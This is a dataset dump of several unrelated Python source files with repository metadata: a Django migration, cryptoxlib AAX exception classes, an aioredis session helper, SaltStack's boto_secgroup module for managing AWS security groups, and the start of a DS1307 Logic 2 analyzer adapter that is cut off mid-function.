                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_unit', models.CharField(max_length=255)),
            ],
        ),
        # Join model: one row per material usage within a project scheme.
        migrations.CreateModel(
            name='MaterialSchemeProject',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('quantity', models.IntegerField()),
                ('provider_distance', models.IntegerField()),
                ('construction_system_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.ConstructionSystem')),
                ('material_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Material')),
                ('origin_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Origin')),
                ('project_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Project')),
                ('unit_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Unit')),
            ],
        ),
    ]
| true
| true
|
f705e1ac415f1541823e90e5a27d3686709724a5
| 370
|
py
|
Python
|
cryptoxlib/clients/aax/exceptions.py
|
PetrZufan/cryptoxlib-aio
|
8fbb817ee7a7a88693804e24877863370d1d53c7
|
[
"MIT"
] | 90
|
2020-04-09T18:34:49.000Z
|
2022-03-09T14:29:32.000Z
|
cryptoxlib/clients/aax/exceptions.py
|
PetrZufan/cryptoxlib-aio
|
8fbb817ee7a7a88693804e24877863370d1d53c7
|
[
"MIT"
] | 44
|
2020-04-03T17:02:20.000Z
|
2022-01-29T14:51:51.000Z
|
cryptoxlib/clients/aax/exceptions.py
|
PetrZufan/cryptoxlib-aio
|
8fbb817ee7a7a88693804e24877863370d1d53c7
|
[
"MIT"
] | 28
|
2020-04-25T21:34:53.000Z
|
2022-03-31T07:20:07.000Z
|
from typing import Optional
from cryptoxlib.exceptions import CryptoXLibException
class AAXException(CryptoXLibException):
    """Base class for all AAX client errors."""
    pass
class AAXRestException(AAXException):
    """Raised when the AAX REST API returns an error response.

    Exposes the HTTP ``status_code`` and the decoded response ``body``
    (may be None) for callers that need to inspect the failure.
    """
    def __init__(self, status_code: int, body: Optional[dict]):
        super().__init__(f"Rest API exception: status [{status_code}], response [{body}]")
        self.status_code = status_code
        self.body = body
| 24.666667
| 84
| 0.778378
|
from typing import Optional
from cryptoxlib.exceptions import CryptoXLibException
class AAXException(CryptoXLibException):
    """Base class for all AAX client errors."""
    pass
class AAXRestException(AAXException):
    """Raised when the AAX REST API returns an error response."""
    def __init__(self, status_code: int, body: Optional[dict]):
        super().__init__(f"Rest API exception: status [{status_code}], response [{body}]")
        self.status_code = status_code
        self.body = body
| true
| true
|
f705e31f80b4e24a70351eb21bb89c4f68671a24
| 1,229
|
py
|
Python
|
service_api/domain/redis.py
|
123456789-dnipro/hackaton
|
7ad3017d31a1fe6c6cb72f2227e8a108a30a156b
|
[
"MIT"
] | null | null | null |
service_api/domain/redis.py
|
123456789-dnipro/hackaton
|
7ad3017d31a1fe6c6cb72f2227e8a108a30a156b
|
[
"MIT"
] | 1
|
2021-06-01T23:53:20.000Z
|
2021-06-01T23:53:20.000Z
|
service_api/domain/redis.py
|
123456789-dnipro/hackaton
|
7ad3017d31a1fe6c6cb72f2227e8a108a30a156b
|
[
"MIT"
] | null | null | null |
import aioredis
from sanic import Sanic
class RedisWorker:
    """Async wrapper around an aioredis connection for sessions and
    confirmation codes."""

    def __init__(self):
        self.__host = None
        self.__pool = None

    async def init(self, app: Sanic):
        """Open the redis connection using the host from the app config."""
        self.__host = app.config.REDIS_HOST
        self.__pool = await aioredis.create_redis(self.__host)

    async def check_session(self, token):
        # EXPIRE returns truthy only when the key exists; as a side effect
        # it also refreshes the session TTL to 300 seconds.
        return await self.__pool.expire(token, 300)

    async def set_conf_msg(self, phone, msg):
        """Store a confirmation code for ``phone``, valid for 60 seconds."""
        await self.__pool.set(phone, msg)
        await self.__pool.expire(phone, 60)

    async def get_conf_msg(self, phone, msg):
        """Check ``msg`` against the stored confirmation code for ``phone``.

        Deletes the code on a successful match so it cannot be reused.
        """
        # BUG FIX: the original did not await the redis calls, so it compared
        # a coroutine object with ``msg`` (always False) and never deleted.
        real_code = await self.__pool.get(phone)
        # NOTE(review): redis returns bytes; confirm callers pass a matching
        # bytes ``msg`` (or decode here) before relying on this comparison.
        if real_code == msg:
            await self.__pool.delete(phone)
            return True
        else:
            return False

    async def get_user(self, token):
        """Return the user id stored under the session token, if any."""
        return await self.__pool.get(token)

    async def create_session(self, user_id, token):
        """Create a 300-second session for ``user_id``; reuse an existing
        token if one is already stored for that user."""
        cur_token = await self.__pool.get(user_id)
        if not cur_token:
            await self.__pool.set(token, user_id)
            await self.__pool.expire(token, 300)
        else:
            token = cur_token
        return token

    async def close(self):
        """Close the connection and wait for shutdown to complete."""
        self.__pool.close()
        await self.__pool.wait_closed()
# Module-level singleton used across the service; call ``await redis.init(app)``
# before use.
redis = RedisWorker()
| 26.148936
| 62
| 0.62083
|
import aioredis
from sanic import Sanic
class RedisWorker:
    """Async wrapper around an aioredis connection for sessions and
    confirmation codes."""
    def __init__(self):
        self.__host = None
        self.__pool = None
    async def init(self, app: Sanic):
        # Open the redis connection using the host from the app config.
        self.__host = app.config.REDIS_HOST
        self.__pool = await aioredis.create_redis(self.__host)
    async def check_session(self, token):
        # EXPIRE is truthy only when the key exists; also refreshes the TTL.
        return await self.__pool.expire(token, 300)
    async def set_conf_msg(self, phone, msg):
        # Store a confirmation code valid for 60 seconds.
        await self.__pool.set(phone, msg)
        await self.__pool.expire(phone, 60)
    async def get_conf_msg(self, phone, msg):
        # NOTE(review): ``get`` and ``delete`` are not awaited here, so
        # ``real_code`` is a coroutine and the comparison is always False,
        # and the stored code is never deleted — looks like a bug; confirm.
        real_code = self.__pool.get(phone)
        if real_code == msg:
            self.__pool.delete(phone)
            return True
        else:
            return False
    async def get_user(self, token):
        # Return the user id stored under the session token, if any.
        return await self.__pool.get(token)
    async def create_session(self, user_id, token):
        # Create a 300-second session, reusing any existing token.
        cur_token = await self.__pool.get(user_id)
        if not cur_token:
            await self.__pool.set(token, user_id)
            await self.__pool.expire(token, 300)
        else:
            token = cur_token
        return token
    async def close(self):
        # Close the connection and wait for shutdown to complete.
        self.__pool.close()
        await self.__pool.wait_closed()
# Module-level singleton; initialize with ``await redis.init(app)``.
redis = RedisWorker()
| true
| true
|
f705e3f0d1abe21f5b92ea10cdd8b37a2a9906b1
| 15,509
|
py
|
Python
|
salt/modules/boto_secgroup.py
|
Achimh3011/salt
|
b6e6968c22f840df0d43bea7e99c188c623b850b
|
[
"Apache-2.0"
] | null | null | null |
salt/modules/boto_secgroup.py
|
Achimh3011/salt
|
b6e6968c22f840df0d43bea7e99c188c623b850b
|
[
"Apache-2.0"
] | null | null | null |
salt/modules/boto_secgroup.py
|
Achimh3011/salt
|
b6e6968c22f840df0d43bea7e99c188c623b850b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Connection module for Amazon Security Groups
.. versionadded:: 2014.7.0
:configuration: This module accepts explicit ec2 credentials but can
also utilize IAM roles assigned to the instance trough Instance Profiles.
Dynamic credentials are then automatically obtained from AWS API and no
further configuration is necessary. More Information available at::
http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html
If IAM roles are not used you need to specify them either in a pillar or
in the minion's config file::
secgroup.keyid: GKTADJGHEIQSXMKKRBJ08H
secgroup.key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
A region may also be specified in the configuration::
secgroup.region: us-east-1
If a region is not specified, the default is us-east-1.
It's also possible to specify key, keyid and region via a profile, either
as a passed in dict, or as a string to pull from pillars or minion config:
myprofile:
keyid: GKTADJGHEIQSXMKKRBJ08H
key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
region: us-east-1
:depends: boto
'''
from __future__ import absolute_import
# Import Python libs
import logging
import re
from distutils.version import LooseVersion as _LooseVersion
import six
log = logging.getLogger(__name__)
# Import third party libs
try:
import boto
import boto.ec2
logging.getLogger('boto').setLevel(logging.CRITICAL)
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
from six import string_types
import salt.utils.odict as odict
def __virtual__():
    '''
    Load this module only when boto is importable and at least version 2.4.0.

    Boto < 2.4.0 exposes different GroupOrCIDR attributes (no ``group_id``),
    so older versions are rejected.
    '''
    if not HAS_BOTO:
        return False
    minimum = _LooseVersion('2.4.0')
    return _LooseVersion(boto.__version__) >= minimum
def exists(name=None, region=None, key=None, keyid=None, profile=None,
           vpc_id=None, group_id=None):
    '''
    Check whether a security group exists.

    CLI example::
        salt myminion boto_secgroup.exists mysecgroup
    '''
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return False
    # _get_group returns the group object or None; coerce to a boolean.
    return bool(_get_group(conn, name, vpc_id, group_id, region))
def _split_rules(rules):
'''
Split rules with combined grants into individual rules.
Amazon returns a set of rules with the same protocol, from and to ports
together as a single rule with a set of grants. Authorizing and revoking
rules, however, is done as a split set of rules. This function splits the
rules up.
'''
split = []
for rule in rules:
ip_protocol = rule.get('ip_protocol')
to_port = rule.get('to_port')
from_port = rule.get('from_port')
grants = rule.get('grants')
for grant in grants:
_rule = {'ip_protocol': ip_protocol,
'to_port': to_port,
'from_port': from_port}
for key, val in six.iteritems(grant):
_rule[key] = val
split.append(_rule)
return split
def _get_group(conn, name=None, vpc_id=None, group_id=None, region=None):
    '''
    Get a group object given a name, name and vpc_id or group_id. Return a
    boto.ec2.securitygroup.SecurityGroup object if the group is found, else
    return None.
    '''
    if name:
        if vpc_id is None:
            log.debug('getting group for {0}'.format(name))
            group_filter = {'group-name': name}
            filtered_groups = conn.get_all_security_groups(filters=group_filter)
            # security groups can have the same name if groups exist in both
            # EC2-Classic and EC2-VPC
            # iterate through groups to ensure we return the EC2-Classic
            # security group
            for group in filtered_groups:
                # a group in EC2-Classic will have vpc_id set to None
                if group.vpc_id is None:
                    return group
            return None
        elif vpc_id:
            log.debug('getting group for {0} in vpc_id {1}'.format(name, vpc_id))
            # NOTE(review): EC2 filter names are hyphenated ('vpc-id');
            # confirm this 'vpc_id' key is accepted by the API in use.
            group_filter = {'group-name': name, 'vpc_id': vpc_id}
            filtered_groups = conn.get_all_security_groups(filters=group_filter)
            # Require exactly one match to avoid returning the wrong group.
            if len(filtered_groups) == 1:
                return filtered_groups[0]
            else:
                return None
        else:
            return None
    elif group_id:
        try:
            groups = conn.get_all_security_groups(group_ids=[group_id])
        except boto.exception.BotoServerError as e:
            # Unknown group id: AWS reports it as a server error.
            log.debug(e)
            return None
        if len(groups) == 1:
            return groups[0]
        else:
            return None
    else:
        # Neither a name nor a group_id was supplied.
        return None
def get_group_id(name, vpc_id=None, region=None, key=None, keyid=None, profile=None):
    '''
    Get a Group ID given a Group Name or Group Name and VPC ID.

    Returns the group id string, or ``False`` when no connection could be
    made or no matching group was found.

    CLI example::
        salt myminion boto_secgroup.get_group_id mysecgroup
    '''
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return False
    # BUG FIX: ``region`` was previously passed positionally and landed in
    # _get_group's ``group_id`` parameter; pass it by keyword instead.
    group = _get_group(conn, name, vpc_id, region=region)
    if group:
        return group.id
    return False
def convert_to_group_ids(groups, vpc_id, region=None, key=None, keyid=None,
                         profile=None):
    '''
    Given a list of security groups and a vpc_id, convert_to_group_ids will
    convert all list items in the given list to security group ids.
    CLI example::
        salt myminion boto_secgroup.convert_to_group_ids mysecgroup vpc-89yhh7h
    '''
    log.debug('security group contents {0} pre-conversion'.format(groups))
    group_ids = []
    for group in groups:
        # Entries already shaped like 'sg-...' are passed through unchanged.
        if re.match('sg-.*', group):
            log.debug('group {0} is a group id. get_group_id not called.'
                      .format(group))
            group_ids.append(group)
        else:
            log.debug('calling boto_secgroup.get_group_id for'
                      ' group name {0}'.format(group))
            group_id = get_group_id(group, vpc_id, region, key, keyid, profile)
            log.debug('group name {0} has group id {1}'.format(
                group, group_id)
            )
            # NOTE(review): if the lookup fails, get_group_id returns False
            # and this appends the literal string 'False' — confirm callers
            # tolerate that.
            group_ids.append(str(group_id))
    log.debug('security group contents {0} post-conversion'.format(group_ids))
    return group_ids
def get_config(name=None, group_id=None, region=None, key=None, keyid=None,
               profile=None, vpc_id=None):
    '''
    Get the configuration for a security group.

    Returns an ordered dict with the group's name, id, owner, description
    and flattened rules, or None when the group (or connection) is missing.

    CLI example::
        salt myminion boto_secgroup.get_config mysecgroup
    '''
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return None
    sg = _get_group(conn, name, vpc_id, group_id, region)
    if sg:
        ret = odict.OrderedDict()
        ret['name'] = sg.name
        # TODO: add support for vpc_id in return
        # ret['vpc_id'] = sg.vpc_id
        ret['group_id'] = sg.id
        ret['owner_id'] = sg.owner_id
        ret['description'] = sg.description
        # TODO: add support for tags
        _rules = []
        for rule in sg.rules:
            log.debug('examining rule {0} for group {1}'.format(rule, sg.id))
            attrs = ['ip_protocol', 'from_port', 'to_port', 'grants']
            _rule = odict.OrderedDict()
            for attr in attrs:
                val = getattr(rule, attr)
                if not val:
                    continue
                if attr == 'grants':
                    # Translate each boto grant object into a plain dict,
                    # renaming boto attributes to salt's canonical keys.
                    _grants = []
                    for grant in val:
                        log.debug('examining grant {0} for'.format(grant))
                        g_attrs = {'name': 'source_group_name',
                                   'owner_id': 'source_group_owner_id',
                                   'group_id': 'source_group_group_id',
                                   'cidr_ip': 'cidr_ip'}
                        _grant = odict.OrderedDict()
                        for g_attr, g_attr_map in six.iteritems(g_attrs):
                            g_val = getattr(grant, g_attr)
                            if not g_val:
                                continue
                            _grant[g_attr_map] = g_val
                        _grants.append(_grant)
                    _rule['grants'] = _grants
                elif attr == 'from_port':
                    # Ports come back as strings; normalize to int.
                    _rule[attr] = int(val)
                elif attr == 'to_port':
                    _rule[attr] = int(val)
                else:
                    _rule[attr] = val
            _rules.append(_rule)
        # One rule per grant, matching the authorize/revoke granularity.
        ret['rules'] = _split_rules(_rules)
        return ret
    else:
        return None
def create(name, description, vpc_id=None, region=None, key=None, keyid=None,
           profile=None):
    '''
    Create a security group.

    Returns True on success, False when the connection or the API call
    failed. (Docstring previously said "autoscale group" — corrected.)

    CLI example::
        salt myminion boto_secgroup.create mysecgroup 'My Security Group'
    '''
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return False
    created = conn.create_security_group(name, description, vpc_id)
    if created:
        log.info('Created security group {0}.'.format(name))
        return True
    else:
        msg = 'Failed to create security group {0}.'.format(name)
        log.error(msg)
        return False
def delete(name=None, group_id=None, region=None, key=None, keyid=None,
           profile=None, vpc_id=None):
    '''
    Delete a security group.

    Returns True on success, False when the group was not found or the API
    call failed. (Docstring previously said "autoscale group" — corrected.)

    CLI example::
        salt myminion boto_secgroup.delete mysecgroup
    '''
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return False
    group = _get_group(conn, name, vpc_id, group_id, region)
    if group:
        # Delete by resolved id so name/vpc lookups and explicit ids behave
        # identically.
        deleted = conn.delete_security_group(group_id=group.id)
        if deleted:
            log.info('Deleted security group {0} with id {1}.'.format(group.name,
                                                                      group.id))
            return True
        else:
            msg = 'Failed to delete security group {0}.'.format(name)
            log.error(msg)
            return False
    else:
        log.debug('Security group not found.')
        return False
def authorize(name=None, source_group_name=None,
              source_group_owner_id=None, ip_protocol=None,
              from_port=None, to_port=None, cidr_ip=None, group_id=None,
              source_group_group_id=None, region=None, key=None,
              keyid=None, profile=None, vpc_id=None):
    '''
    Add a new rule to an existing security group.

    Returns True when the rule was added, False on any failure (missing
    group, failed connection, or an EC2 API error).

    CLI example::
        salt myminion boto_secgroup.authorize mysecgroup ip_protocol=tcp from_port=80 to_port=80 cidr_ip='['10.0.0.0/8', '192.168.0.0/24']'
    '''
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return False
    group = _get_group(conn, name, vpc_id, group_id, region)
    if group:
        try:
            added = conn.authorize_security_group(
                src_security_group_name=source_group_name,
                src_security_group_owner_id=source_group_owner_id,
                ip_protocol=ip_protocol, from_port=from_port, to_port=to_port,
                cidr_ip=cidr_ip, group_id=group.id,
                src_security_group_group_id=source_group_group_id)
            if added:
                log.info('Added rule to security group {0} with id {1}'
                         .format(group.name, group.id))
                return True
            else:
                msg = ('Failed to add rule to security group {0} with id {1}.'
                       .format(group.name, group.id))
                log.error(msg)
                return False
        except boto.exception.EC2ResponseError as e:
            # e.g. duplicate rule or malformed arguments; log and report.
            log.debug(e)
            msg = ('Failed to add rule to security group {0} with id {1}.'
                   .format(group.name, group.id))
            log.error(msg)
            return False
    else:
        log.debug('Failed to add rule to security group.')
        return False
def revoke(name=None, source_group_name=None,
           source_group_owner_id=None, ip_protocol=None,
           from_port=None, to_port=None, cidr_ip=None, group_id=None,
           source_group_group_id=None, region=None, key=None,
           keyid=None, profile=None, vpc_id=None):
    '''
    Remove a rule from an existing security group.

    Returns True when the rule was removed, False on any failure (missing
    group, failed connection, or an EC2 API error).

    CLI example::
        salt myminion boto_secgroup.revoke mysecgroup ip_protocol=tcp from_port=80 to_port=80 cidr_ip='10.0.0.0/8'
    '''
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return False
    group = _get_group(conn, name, vpc_id, group_id, region)
    if group:
        try:
            revoked = conn.revoke_security_group(
                src_security_group_name=source_group_name,
                src_security_group_owner_id=source_group_owner_id,
                ip_protocol=ip_protocol, from_port=from_port, to_port=to_port,
                cidr_ip=cidr_ip, group_id=group.id,
                src_security_group_group_id=source_group_group_id)
            if revoked:
                log.info('Removed rule from security group {0} with id {1}.'
                         .format(group.name, group.id))
                return True
            else:
                msg = ('Failed to remove rule from security group {0} with id {1}.'
                       .format(group.name, group.id))
                log.error(msg)
                return False
        except boto.exception.EC2ResponseError as e:
            # e.g. rule does not exist or malformed arguments; log and report.
            log.debug(e)
            msg = ('Failed to remove rule from security group {0} with id {1}.'
                   .format(group.name, group.id))
            log.error(msg)
            return False
    else:
        log.debug('Failed to remove rule from security group.')
        return False
def _get_conn(region, key, keyid, profile):
    '''
    Get a boto connection to ec2.
    '''
    # A profile (config-option name or inline dict) overrides any explicitly
    # supplied credentials and region.
    if profile:
        if isinstance(profile, string_types):
            profile_data = __salt__['config.option'](profile)
        elif isinstance(profile, dict):
            profile_data = profile
        key = profile_data.get('key', None)
        keyid = profile_data.get('keyid', None)
        region = profile_data.get('region', None)
    # Fall back to minion configuration, then to a sensible default region.
    if not region:
        region = __salt__['config.option']('secgroup.region')
    if not region:
        region = 'us-east-1'
    if not key and __salt__['config.option']('secgroup.key'):
        key = __salt__['config.option']('secgroup.key')
    if not keyid and __salt__['config.option']('secgroup.keyid'):
        keyid = __salt__['config.option']('secgroup.keyid')
    try:
        return boto.ec2.connect_to_region(region, aws_access_key_id=keyid,
                                          aws_secret_access_key=key)
    except boto.exception.NoAuthHandlerFound:
        log.error('No authentication credentials found when attempting to'
                  ' make ec2 connection for security groups.')
        return None
| 35.009029
| 139
| 0.59488
|
from __future__ import absolute_import
import logging
import re
from distutils.version import LooseVersion as _LooseVersion
import six
log = logging.getLogger(__name__)
try:
import boto
import boto.ec2
logging.getLogger('boto').setLevel(logging.CRITICAL)
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
from six import string_types
import salt.utils.odict as odict
def __virtual__():
    """Only load this module when a new-enough boto is importable."""
    required_boto_version = '2.4.0'
    if not HAS_BOTO:
        return False
    return _LooseVersion(boto.__version__) >= _LooseVersion(required_boto_version)
def exists(name=None, region=None, key=None, keyid=None, profile=None,
           vpc_id=None, group_id=None):
    """Return True when a matching security group exists, else False."""
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return False
    # _get_group yields the group object or None; collapse to a boolean.
    return bool(_get_group(conn, name, vpc_id, group_id, region))
def _split_rules(rules):
split = []
for rule in rules:
ip_protocol = rule.get('ip_protocol')
to_port = rule.get('to_port')
from_port = rule.get('from_port')
grants = rule.get('grants')
for grant in grants:
_rule = {'ip_protocol': ip_protocol,
'to_port': to_port,
'from_port': from_port}
for key, val in six.iteritems(grant):
_rule[key] = val
split.append(_rule)
return split
def _get_group(conn, name=None, vpc_id=None, group_id=None, region=None):
    """Look up one security group by name (optionally within a VPC) or by
    group id.  Returns the boto group object, or None when not found or
    when the lookup is ambiguous.
    """
    if name:
        if vpc_id is None:
            log.debug('getting group for {0}'.format(name))
            group_filter = {'group-name': name}
            filtered_groups = conn.get_all_security_groups(filters=group_filter)
            # Without a VPC, only an EC2-classic group (vpc_id is None) counts.
            for group in filtered_groups:
                if group.vpc_id is None:
                    return group
            return None
        elif vpc_id:
            log.debug('getting group for {0} in vpc_id {1}'.format(name, vpc_id))
            # BUG FIX: EC2 filter names are hyphenated ('vpc-id'), matching
            # the 'group-name' filter above; 'vpc_id' is not a valid filter.
            group_filter = {'group-name': name, 'vpc-id': vpc_id}
            filtered_groups = conn.get_all_security_groups(filters=group_filter)
            if len(filtered_groups) == 1:
                return filtered_groups[0]
            else:
                return None
        else:
            return None
    elif group_id:
        try:
            groups = conn.get_all_security_groups(group_ids=[group_id])
        except boto.exception.BotoServerError as e:
            log.debug(e)
            return None
        if len(groups) == 1:
            return groups[0]
        else:
            return None
    else:
        return None
def get_group_id(name, vpc_id=None, region=None, key=None, keyid=None, profile=None):
    """Return the id of the security group called *name*, or False when the
    connection fails or no group matches.
    """
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return False
    # BUG FIX: region was previously passed positionally into _get_group's
    # group_id parameter; pass it by keyword so the lookup works as intended.
    group = _get_group(conn, name, vpc_id, region=region)
    if group:
        return group.id
    return False
def convert_to_group_ids(groups, vpc_id, region=None, key=None, keyid=None,
                         profile=None):
    """Translate a mixed list of group names and 'sg-*' ids into ids only."""
    log.debug('security group contents {0} pre-conversion'.format(groups))
    group_ids = []
    for group in groups:
        if not re.match('sg-.*', group):
            # A name: resolve it through the EC2 API.
            log.debug('calling boto_secgroup.get_group_id for'
                      ' group name {0}'.format(group))
            resolved = get_group_id(group, vpc_id, region, key, keyid, profile)
            log.debug('group name {0} has group id {1}'.format(
                group, resolved)
            )
            group_ids.append(str(resolved))
        else:
            # Already an id: pass it through untouched.
            log.debug('group {0} is a group id. get_group_id not called.'
                      .format(group))
            group_ids.append(group)
    log.debug('security group contents {0} post-conversion'.format(group_ids))
    return group_ids
def get_config(name=None, group_id=None, region=None, key=None, keyid=None,
               profile=None, vpc_id=None):
    """Return an OrderedDict describing the security group (name, id, owner,
    description and flattened rules), or None when the group is not found or
    no connection could be made.
    """
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return None
    sg = _get_group(conn, name, vpc_id, group_id, region)
    if sg:
        ret = odict.OrderedDict()
        ret['name'] = sg.name
        ret['group_id'] = sg.id
        ret['owner_id'] = sg.owner_id
        ret['description'] = sg.description
        # Collect rules in this module's dict format before flattening the
        # per-rule grant lists with _split_rules.
        _rules = []
        for rule in sg.rules:
            log.debug('examining rule {0} for group {1}'.format(rule, sg.id))
            attrs = ['ip_protocol', 'from_port', 'to_port', 'grants']
            _rule = odict.OrderedDict()
            for attr in attrs:
                val = getattr(rule, attr)
                # Unset attributes are omitted entirely.
                if not val:
                    continue
                if attr == 'grants':
                    _grants = []
                    for grant in val:
                        log.debug('examining grant {0} for'.format(grant))
                        # Map boto grant attribute names to the keys this
                        # module uses in its rule dicts.
                        g_attrs = {'name': 'source_group_name',
                                   'owner_id': 'source_group_owner_id',
                                   'group_id': 'source_group_group_id',
                                   'cidr_ip': 'cidr_ip'}
                        _grant = odict.OrderedDict()
                        for g_attr, g_attr_map in six.iteritems(g_attrs):
                            g_val = getattr(grant, g_attr)
                            if not g_val:
                                continue
                            _grant[g_attr_map] = g_val
                        _grants.append(_grant)
                    _rule['grants'] = _grants
                elif attr == 'from_port':
                    # boto returns ports as strings; normalize to int.
                    _rule[attr] = int(val)
                elif attr == 'to_port':
                    _rule[attr] = int(val)
                else:
                    _rule[attr] = val
            _rules.append(_rule)
        ret['rules'] = _split_rules(_rules)
        return ret
    else:
        return None
def create(name, description, vpc_id=None, region=None, key=None, keyid=None,
           profile=None):
    """Create a security group; True on success, False otherwise."""
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return False
    if conn.create_security_group(name, description, vpc_id):
        log.info('Created security group {0}.'.format(name))
        return True
    msg = 'Failed to create security group {0}.'.format(name)
    log.error(msg)
    return False
def delete(name=None, group_id=None, region=None, key=None, keyid=None,
           profile=None, vpc_id=None):
    """Delete a security group located by name/vpc or by id."""
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return False
    group = _get_group(conn, name, vpc_id, group_id, region)
    if not group:
        log.debug('Security group not found.')
        return False
    if conn.delete_security_group(group_id=group.id):
        log.info('Deleted security group {0} with id {1}.'.format(group.name,
                                                                  group.id))
        return True
    msg = 'Failed to delete security group {0}.'.format(name)
    log.error(msg)
    return False
def authorize(name=None, source_group_name=None,
              source_group_owner_id=None, ip_protocol=None,
              from_port=None, to_port=None, cidr_ip=None, group_id=None,
              source_group_group_id=None, region=None, key=None,
              keyid=None, profile=None, vpc_id=None):
    """Add a rule to an existing security group; True on success."""
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return False
    group = _get_group(conn, name, vpc_id, group_id, region)
    if not group:
        log.debug('Failed to add rule to security group.')
        return False
    # Shared failure message for both the API-error and no-op outcomes.
    failure_msg = ('Failed to add rule to security group {0} with id {1}.'
                   .format(group.name, group.id))
    try:
        was_added = conn.authorize_security_group(
            src_security_group_name=source_group_name,
            src_security_group_owner_id=source_group_owner_id,
            ip_protocol=ip_protocol, from_port=from_port, to_port=to_port,
            cidr_ip=cidr_ip, group_id=group.id,
            src_security_group_group_id=source_group_group_id)
    except boto.exception.EC2ResponseError as exc:
        log.debug(exc)
        log.error(failure_msg)
        return False
    if was_added:
        log.info('Added rule to security group {0} with id {1}'
                 .format(group.name, group.id))
        return True
    log.error(failure_msg)
    return False
def revoke(name=None, source_group_name=None,
           source_group_owner_id=None, ip_protocol=None,
           from_port=None, to_port=None, cidr_ip=None, group_id=None,
           source_group_group_id=None, region=None, key=None,
           keyid=None, profile=None, vpc_id=None):
    """Remove a rule from an existing security group; True on success."""
    conn = _get_conn(region, key, keyid, profile)
    if not conn:
        return False
    group = _get_group(conn, name, vpc_id, group_id, region)
    if not group:
        log.debug('Failed to remove rule from security group.')
        return False
    # Shared failure message for both the API-error and no-op outcomes.
    failure_msg = ('Failed to remove rule from security group {0} with id {1}.'
                   .format(group.name, group.id))
    try:
        was_revoked = conn.revoke_security_group(
            src_security_group_name=source_group_name,
            src_security_group_owner_id=source_group_owner_id,
            ip_protocol=ip_protocol, from_port=from_port, to_port=to_port,
            cidr_ip=cidr_ip, group_id=group.id,
            src_security_group_group_id=source_group_group_id)
    except boto.exception.EC2ResponseError as exc:
        log.debug(exc)
        log.error(failure_msg)
        return False
    if was_revoked:
        log.info('Removed rule from security group {0} with id {1}.'
                 .format(group.name, group.id))
        return True
    log.error(failure_msg)
    return False
def _get_conn(region, key, keyid, profile):
    """Build a boto EC2 connection, or None when no credentials resolve."""
    # A profile (config-option name or inline dict) overrides any explicitly
    # supplied credentials and region.
    if profile:
        if isinstance(profile, string_types):
            profile_data = __salt__['config.option'](profile)
        elif isinstance(profile, dict):
            profile_data = profile
        key = profile_data.get('key', None)
        keyid = profile_data.get('keyid', None)
        region = profile_data.get('region', None)
    # Fall back to minion configuration, then to a sensible default region.
    if not region:
        region = __salt__['config.option']('secgroup.region')
    if not region:
        region = 'us-east-1'
    if not key and __salt__['config.option']('secgroup.key'):
        key = __salt__['config.option']('secgroup.key')
    if not keyid and __salt__['config.option']('secgroup.keyid'):
        keyid = __salt__['config.option']('secgroup.keyid')
    try:
        return boto.ec2.connect_to_region(region, aws_access_key_id=keyid,
                                          aws_secret_access_key=key)
    except boto.exception.NoAuthHandlerFound:
        log.error('No authentication credentials found when attempting to'
                  ' make ec2 connection for security groups.')
        return None
| true
| true
|
f705e5539327770cb56ee6c0a5e5510efbddda11
| 1,677
|
py
|
Python
|
logic2_analyzers/DS1307/Hla.py
|
martonmiklos/sigrokdecoders_to_logic2_analyzers
|
9dd9b9a610c17e6ae525829c9112d11a80d016e7
|
[
"MIT"
] | 5
|
2020-04-15T20:45:06.000Z
|
2020-05-31T02:45:21.000Z
|
logic2_analyzers/DS1307/Hla.py
|
martonmiklos/sigrokdecoders_to_logic2_analyzers
|
9dd9b9a610c17e6ae525829c9112d11a80d016e7
|
[
"MIT"
] | 1
|
2020-07-15T09:23:05.000Z
|
2020-07-15T10:04:48.000Z
|
logic2_analyzers/DS1307/Hla.py
|
martonmiklos/sigrokdecoders_to_logic2_analyzers
|
9dd9b9a610c17e6ae525829c9112d11a80d016e7
|
[
"MIT"
] | 1
|
2020-04-20T18:49:36.000Z
|
2020-04-20T18:49:36.000Z
|
import sys
sys.path.insert(0, "../") # our fake sigrokdecode lives one dir upper
from pd import Decoder
class DS1307():
    """Adapter exposing the sigrok DS1307 decoder to the Logic 2 HLA API."""

    def __init__(self):
        self.sigrokDecoder = Decoder()
        # BUG FIX: decode() reads self.packet before anything assigns it;
        # initialize it here so the first call cannot raise AttributeError.
        self.packet = {}

    def get_capabilities(self):
        """Translate the sigrok decoder's options into Logic 2 settings."""
        settings = {}
        for option in self.sigrokDecoder.options:
            settingType = ''
            if "values" not in option:
                # TODO sigrok docs does not mention that default is mandatory;
                # infer the setting type from the default's Python type.
                if isinstance(option['default'], str):
                    settingType = 'string'
                elif isinstance(option['default'], (int, float)):
                    settingType = 'number'
                else:
                    print("Cannot determine the type of the " + option['desc'] + " parameter from it's default value: " + option['default'])
            settings[option["desc"]] = {
                'type': settingType
            }
            if "values" in option:
